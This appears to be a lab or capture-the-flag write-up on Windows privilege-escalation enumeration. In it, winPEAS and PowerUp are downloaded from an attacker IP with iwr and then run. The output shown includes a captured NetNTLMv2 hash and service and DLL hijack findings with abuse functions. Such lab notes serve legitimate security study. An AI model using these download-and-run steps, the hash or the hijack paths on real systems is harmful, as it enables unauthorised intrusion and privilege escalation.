PEAS
Conducting an automated enumeration after performing a manual enumeration
PS C:\tmp> iwr -Uri http://192.168.45.197/winPEASx64.exe -Outfile C:\tmp\winPEASx64.exe
Delivery complete
PS C:\tmp> ./winPEASx64.exe
[!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
((#########################(/**********************(((((
((##############################(/*****************(((((
((###################################(/************(((((
((#######################################(*********(((((
((#######(,.***.,(###################(..***.*******(((((
((#######*(#####((##################((######/(*****(((((
((###################(/***********(##############()(((((
(((#####################/*******(################)((((((
((((############################################)((((((
(((((##########################################)(((((((
((((((########################################)(((((((
((((((((####################################)((((((((
(((((((((#################################)(((((((((
((((((((((##########################)(((((((((
((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((
Executing PEAS
ENV
???????????? User Environment Variables
? Check for some passwords or keys in the env variables
COMPUTERNAME: CRAFT
PSExecutionPolicyPreference: Bypass
LIBO_VERSION: 7.1.4.2
LOCALAPPDATA: C:\Users\thecybergeek\AppData\Local
PSModulePath: C:\Users\thecybergeek\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\Program Files\LibreOffice\program;C:\Program Files\LibreOffice\;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\thecybergeek\AppData\Local\Microsoft\WindowsApps;C:\Program Files\LibreOffice\program\..\program
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 25
PYTHONPATH: C:\Program Files\LibreOffice\program\python-core-3.8.8\lib;C:\Program Files\LibreOffice\program\python-core-3.8.8\lib\site-packages;C:\Program Files\LibreOffice\program
ProgramFiles: C:\Program Files
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
LANGUAGE: en_US.UTF-8
SystemRoot: C:\Windows
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
ProgramData: C:\ProgramData
PROCESSOR_REVISION: 0101
USERNAME: thecybergeek
CommonProgramW6432: C:\Program Files\Common Files
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
ComSpec: C:\Windows\system32\cmd.exe
SystemDrive: C:
TEMP: C:\Users\THECYB~1\AppData\Local\Temp
PUBLIC: C:\Users\Public
NUMBER_OF_PROCESSORS: 2
APPDATA: C:\Users\thecybergeek\AppData\Roaming
URE_BOOTSTRAP: file:///C:/Program%20Files/LibreOffice/program/fundamental.ini
TMP: C:\Users\THECYB~1\AppData\Local\Temp
USERPROFILE: C:\Users\thecybergeek
ProgramW6432: C:\Program Files
windir: C:\Windows
USERDOMAIN: CRAFT
???????????? System Environment Variables
? Check for some passwords or keys in the env variables
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 0101
LAPS
LSA Protection
Credentials Guard
Cached Creds
AV
UAC
PowerShell
NTLM
thecybergeek::CRAFT:1122334455667788:4c718aa3412c2cb8895978b0627f8298:0101000000000000f650bb55b3a8db018ee94f8e54d49e23000000000800300030000000000000000000000000300000f0805dc4258da05ceb12eadfabf0164415e143bf8acb1b7adb7b7e42108231340a00100000000000000000000000000000000000090000000000000000000000
.NET
Services
Write access to the Apache directory
Modifiable
Installed Programs
Network
DNS Cached
Interesting Files
PowerUp
PS C:\tmp> iwr -Uri http://192.168.45.197/PowerUp.ps1 -Outfile C:\tmp\PowerUp.ps1
Delivery complete
PS C:\tmp> . .\PowerUp.ps1
PS C:\tmp> Invoke-AllChecks
ServiceName : ResumeService1
Path : C:\Program Files\nssm-2.24\win64\nssm.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users;
Permissions=AppendData/AddSubdirectory}
StartName : .\thecybergeek
AbuseFunction : Write-ServiceBinary -Name 'ResumeService1' -Path <HijackPath>
CanRestart : False
Name : ResumeService1
Check : Unquoted Service Paths
ServiceName : ResumeService1
Path : C:\Program Files\nssm-2.24\win64\nssm.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users;
Permissions=WriteData/AddFile}
StartName : .\thecybergeek
AbuseFunction : Write-ServiceBinary -Name 'ResumeService1' -Path <HijackPath>
CanRestart : False
Name : ResumeService1
Check : Unquoted Service Paths
ModifiablePath : C:\Users\thecybergeek\AppData\Local\Microsoft\WindowsApps
IdentityReference : CRAFT\thecybergeek
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\thecybergeek\AppData\Local\Microsoft\WindowsApps
Name : C:\Users\thecybergeek\AppData\Local\Microsoft\WindowsApps
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath
'C:\Users\thecybergeek\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
Invoking